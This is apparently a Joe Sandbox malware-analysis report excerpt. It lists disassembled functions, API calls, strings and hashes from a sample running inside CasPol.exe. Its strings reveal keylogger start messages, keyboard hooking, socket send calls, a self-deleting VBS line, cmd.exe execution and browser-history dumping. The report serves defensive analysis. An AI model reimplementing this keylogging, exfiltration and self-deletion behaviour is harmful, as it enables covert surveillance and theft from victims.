                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                  • _free.LIBCMT ref: 100091E2
                                                                                                                  • _free.LIBCMT ref: 100091F4
                                                                                                                  • _free.LIBCMT ref: 10009206
                                                                                                                  • _free.LIBCMT ref: 10009218
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                  • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                  • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                  • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00443315
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 00443327
                                                                                                                  • _free.LIBCMT ref: 0044333A
                                                                                                                  • _free.LIBCMT ref: 0044334B
                                                                                                                  • _free.LIBCMT ref: 0044335C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                  • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                                                                                  • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                  • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 1000536F
                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                  • _free.LIBCMT ref: 10005381
                                                                                                                  • _free.LIBCMT ref: 10005394
                                                                                                                  • _free.LIBCMT ref: 100053A5
                                                                                                                  • _free.LIBCMT ref: 100053B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                  • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                  • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                  • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                  APIs
                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                  • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                    • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                    • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                  • String ID: (FG
                                                                                                                  • API String ID: 3142014140-2273637114
                                                                                                                  • Opcode ID: 9a1b59bbed3356950195ba07b1a03bd03f5c7be3db3bd7b9db76135773cdd398
                                                                                                                  • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                                                                                  • Opcode Fuzzy Hash: 9a1b59bbed3356950195ba07b1a03bd03f5c7be3db3bd7b9db76135773cdd398
                                                                                                                  • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                                                                                  APIs
                                                                                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                    • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                    • Part of subcall function 0040428C: connect.WS2_32(?,00F4B2F8,00000010), ref: 004042A5
                                                                                                                    • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                  • String ID: XCG$`AG$>G
                                                                                                                  • API String ID: 2334542088-2372832151
                                                                                                                  • Opcode ID: d5fde74a72ab23943b571da8d82e14ca3d032a186f9542a9d8838a507179a395
                                                                                                                  • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                                  • Opcode Fuzzy Hash: d5fde74a72ab23943b571da8d82e14ca3d032a186f9542a9d8838a507179a395
                                                                                                                  • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442724
                                                                                                                  • _free.LIBCMT ref: 004427EF
                                                                                                                  • _free.LIBCMT ref: 004427F9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                  • API String ID: 2506810119-3657627342
                                                                                                                  • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                  • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                                                                                  • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                  • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10004C1D
                                                                                                                  • _free.LIBCMT ref: 10004CE8
                                                                                                                  • _free.LIBCMT ref: 10004CF2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                  • API String ID: 2506810119-3657627342
                                                                                                                  • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                  • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                  • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                  • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 100099A8
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100099D6
                                                                                                                  • GetLastError.KERNEL32 ref: 10009A07
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 2456169464-661517699
                                                                                                                  • Opcode ID: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                                                                                                                  • Instruction ID: 4dca0cb6e5ae08cfaecef52c11f05f5c50a0db4386d341a895ff8b0f45518e07
                                                                                                                  • Opcode Fuzzy Hash: 427868bedf5aeb2dbe74816aae85c58cffe3606ac2297d0d696d101185ff0d15
                                                                                                                  • Instruction Fuzzy Hash: 7D314375A002199FEB14CF69CC95AEAB7B9EF48344F0144ADE50AD7254D730AD81CB61
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                    • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                  • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                  • API String ID: 368326130-2663660666
                                                                                                                  • Opcode ID: fbe8e0342797dfc48e0b09f38c49579a36867b600651027c00f538e7970574aa
                                                                                                                  • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                                                                                  • Opcode Fuzzy Hash: fbe8e0342797dfc48e0b09f38c49579a36867b600651027c00f538e7970574aa
                                                                                                                  • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                  • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateExecuteExitFileProcessShell
                                                                                                                  • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                                  • API String ID: 2309964880-3562070623
                                                                                                                  • Opcode ID: ae3d1df5e193353fa7a7bad1cac546cd153fd42e00a47a17a1ca5c3f100fcf7e
                                                                                                                  • Instruction ID: ace0f40cc0655528612a0b5402a09b3609fe8f046c2334cef27d09c8f481fd79
                                                                                                                  • Opcode Fuzzy Hash: ae3d1df5e193353fa7a7bad1cac546cd153fd42e00a47a17a1ca5c3f100fcf7e
                                                                                                                  • Instruction Fuzzy Hash: D42145315042405AC324FB25E8969BF77E4AFD1318F50453FF482620F2EF38AA49C69A
                                                                                                                  APIs
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                                                  • String ID: Offline Keylogger Started
                                                                                                                  • API String ID: 465354869-4114347211
                                                                                                                  • Opcode ID: 570e04be0e4ffa855f27f1ca213c906f0df4e766948eb3acc4b01943e62d06e0
                                                                                                                  • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                                                                                  • Opcode Fuzzy Hash: 570e04be0e4ffa855f27f1ca213c906f0df4e766948eb3acc4b01943e62d06e0
                                                                                                                  • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                  • String ID: Online Keylogger Started
                                                                                                                  • API String ID: 112202259-1258561607
                                                                                                                  • Opcode ID: 564b200d65e3c73e3a7e2304ccbb93078783a11880c439d0c88e3e8c5b9bf4b9
                                                                                                                  • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                                  • Opcode Fuzzy Hash: 564b200d65e3c73e3a7e2304ccbb93078783a11880c439d0c88e3e8c5b9bf4b9
                                                                                                                  • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                                                                                  • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                                  • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                  • String ID: `@
                                                                                                                  • API String ID: 2583163307-951712118
                                                                                                                  • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                  • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                                  • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                  • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                                  • String ID: Connection Timeout
                                                                                                                  • API String ID: 2055531096-499159329
                                                                                                                  • Opcode ID: 96a4edac1a058f04c3ad407f14895f77ac6fb9ff937b43e6201c32ffecfaeaf2
                                                                                                                  • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                                                                                  • Opcode Fuzzy Hash: 96a4edac1a058f04c3ad407f14895f77ac6fb9ff937b43e6201c32ffecfaeaf2
                                                                                                                  • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                                                                                  APIs
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                    • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                                                                                    • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                  • String ID: bad locale name
                                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                                  • Opcode ID: d75f37e1b89ee78a4a0f808b0b17b1e5c3b7b9634f49529d216c4b18a17b3ee6
                                                                                                                  • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                                                                                  • Opcode Fuzzy Hash: d75f37e1b89ee78a4a0f808b0b17b1e5c3b7b9634f49529d216c4b18a17b3ee6
                                                                                                                  • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                                                                                  APIs
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExecuteShell
                                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                                  • API String ID: 587946157-3896048727
                                                                                                                  • Opcode ID: 48c4e9bf8b9074f27646adf5b30bc281ede9c2cdd6c59f38ee373b2102eacdae
                                                                                                                  • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                  • Opcode Fuzzy Hash: 48c4e9bf8b9074f27646adf5b30bc281ede9c2cdd6c59f38ee373b2102eacdae
                                                                                                                  • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                  APIs
                                                                                                                  • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                  • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                  • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                                                  • String ID: pth_unenc
                                                                                                                  • API String ID: 3123878439-4028850238
                                                                                                                  • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                  • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                  • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                  • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                  APIs
